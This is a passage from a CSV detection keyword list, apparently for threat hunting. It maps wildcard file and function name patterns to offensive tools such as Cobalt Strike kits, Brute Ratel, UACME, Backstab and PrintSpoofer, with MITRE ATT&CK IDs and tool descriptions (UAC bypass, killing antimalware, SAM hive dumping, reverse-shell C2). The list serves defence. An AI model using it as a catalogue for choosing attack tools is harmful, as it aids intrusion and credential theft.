Escalation,https://github.com/itm4n/PrintSpoofer,1,0,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*B67143DE-321D-4034-AC1D-C6BB2D98563F*,offensive_tool_keyword,printspoofer,Abusing impersonation privileges through the Printer Bug,T1134 - T1003 - T1055,TA0004 - TA0003 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,0,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*b7671f125bb2ed21d0476a00cfaa9ed6*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,0,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*b774446d2f110ce954fb0a710f4693c5562ddbd8d56fe84106f2ee80db8b50a2*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*b7dec074f463b0be08dd3a707495e45c7a629502fa6dd7ef972a74a2aff72632*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*ba8fe35020bcd560c0f100bda43c2311bfdbb97aafbe367ac5077cebca59287f*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*babelstrike.py -*,offensive_tool_keyword,BabelStrike,The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin),T1078 - T1114,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/t3l3machus/BabelStrike,1,0,N/A,1,1,38,13,2023-09-12T13:49:30Z,2023-01-10T07:59:00Z -*BabelStrike-main*,offensive_tool_keyword,BabelStrike,The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin),T1078 - T1114,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/t3l3machus/BabelStrike,1,1,N/A,1,1,38,13,2023-09-12T13:49:30Z,2023-01-10T07:59:00Z -*Backdoor LNK*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Persistence,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0xthirteen/StayKit,1,0,N/A,10,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*Backdoor.*,offensive_tool_keyword,backdoor keyword,keyword observed in multiple backdoor tools,T1037.001 - T1037.002 - T1003.001 - T1001.002 - T1055.001,TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*backdoor.asp*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*Backdoor.ASP.FUZZSHELL.A*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Backdoor.ASP.WEBSHELL.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*backdoor.aspx*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*backdoor.jsp*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*backdoor.php*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*Backdoor.PHP.WebShell.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Backdoor/Win.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Backdoor:JS/*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,backdoor signatures,N/A,N/A,N/A,N/A,N/A,N/A -*Backdoor:Linux*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,backdoor signatures,N/A,N/A,N/A,N/A,N/A,N/A -*Backdoor:Python*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,backdoor signatures,N/A,N/A,N/A,N/A,N/A,N/A -*Backdoor:VBS/*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,backdoor signatures,N/A,N/A,N/A,N/A,N/A,N/A -*Backdoor:Win32*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,backdoor signatures,N/A,N/A,N/A,N/A,N/A,N/A -*Backdoor:Win64*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,backdoor signatures,10,10,N/A,N/A,N/A,N/A -*BackdoorableScript*,offensive_tool_keyword,boko,boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored,T1195 - T1078 - T1079 - T1574,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/bashexplode/boko,1,1,N/A,N/A,1,59,12,2021-09-28T22:36:01Z,2020-05-22T21:46:33Z -*--backdoor-all*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,0,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*BackdoorLNK*,offensive_tool_keyword,StayKit,StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.,T1059 - T1053 - T1124,TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/0xthirteen/StayKit,1,1,N/A,N/A,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*backdoorlnkdialog*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Persistence,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0xthirteen/StayKit,1,1,N/A,10,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*backstab.exe*,offensive_tool_keyword,Backstab,A tool to kill antimalware protected processes,T1107 - T1106 - T1543.004 ,TA0002 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/Yaxser/Backstab,1,1,N/A,N/A,10,1237,216,2021-06-19T20:01:52Z,2021-06-15T16:02:11Z -*Backstab.sln*,offensive_tool_keyword,Backstab,A tool to kill antimalware protected processes,T1107 - T1106 - T1543.004 ,TA0002 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/Yaxser/Backstab,1,1,N/A,N/A,10,1237,216,2021-06-19T20:01:52Z,2021-06-15T16:02:11Z -*backstab.x64.*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,1,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*backstab.x86.*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,1,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*Backstab/Driverloading*,offensive_tool_keyword,Backstab,A tool to kill antimalware protected processes,T1107 - T1106 - T1543.004 ,TA0002 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/Yaxser/Backstab,1,1,N/A,N/A,10,1237,216,2021-06-19T20:01:52Z,2021-06-15T16:02:11Z -*Backstab-master*,offensive_tool_keyword,Backstab,A tool to kill antimalware protected processes,T1107 - T1106 - T1543.004 ,TA0002 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/Yaxser/Backstab,1,1,N/A,N/A,10,1237,216,2021-06-19T20:01:52Z,2021-06-15T16:02:11Z -*BackupOperatorToDA.cpp*,offensive_tool_keyword,BackupOperatorToDA,From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller,T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/mpgn/BackupOperatorToDA,1,1,N/A,10,4,335,48,2022-10-05T07:29:46Z,2022-02-15T20:51:46Z -*BackupOperatorToDA.exe*,offensive_tool_keyword,BackupOperatorToDA,From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller,T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/mpgn/BackupOperatorToDA,1,1,N/A,10,4,335,48,2022-10-05T07:29:46Z,2022-02-15T20:51:46Z -*BackupOperatorToDA.sln*,offensive_tool_keyword,BackupOperatorToDA,From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller,T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/mpgn/BackupOperatorToDA,1,1,N/A,10,4,335,48,2022-10-05T07:29:46Z,2022-02-15T20:51:46Z -*BackupOperatorToDA-master*,offensive_tool_keyword,BackupOperatorToDA,From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller,T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/mpgn/BackupOperatorToDA,1,1,N/A,10,4,335,48,2022-10-05T07:29:46Z,2022-02-15T20:51:46Z -*BackupPrivSAM \\*,offensive_tool_keyword,cobaltstrike,A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/m57/cobaltstrike_bofs,1,0,N/A,10,10,153,25,2022-07-23T20:37:52Z,2020-07-30T22:36:51Z -*backupprivsam.*,offensive_tool_keyword,cobaltstrike,A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/m57/cobaltstrike_bofs,1,1,N/A,10,10,153,25,2022-07-23T20:37:52Z,2020-07-30T22:36:51Z -*bad client public DH value*,greyware_tool_keyword,ssh,Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z -*Bad HTTP verb.*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*badger_exports.h*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*badger_no_acl_1030_objects.log*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*badger_svc.exe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*badger_template.ps1*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*badger_x64.exe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*badger_x64_*.bin*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*badger_x64_aws.exe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*badger_x64_stealth_rtl.txt*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*BadgerAtoi*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*BadgerDispatch*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*BadgerDispatchW*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*BadgerMemcpy*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*BadgerMemset*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*BadgerStrcmp*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*BadgerStrlen*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*BadgerWcscmp*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*BadgerWcslen*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - 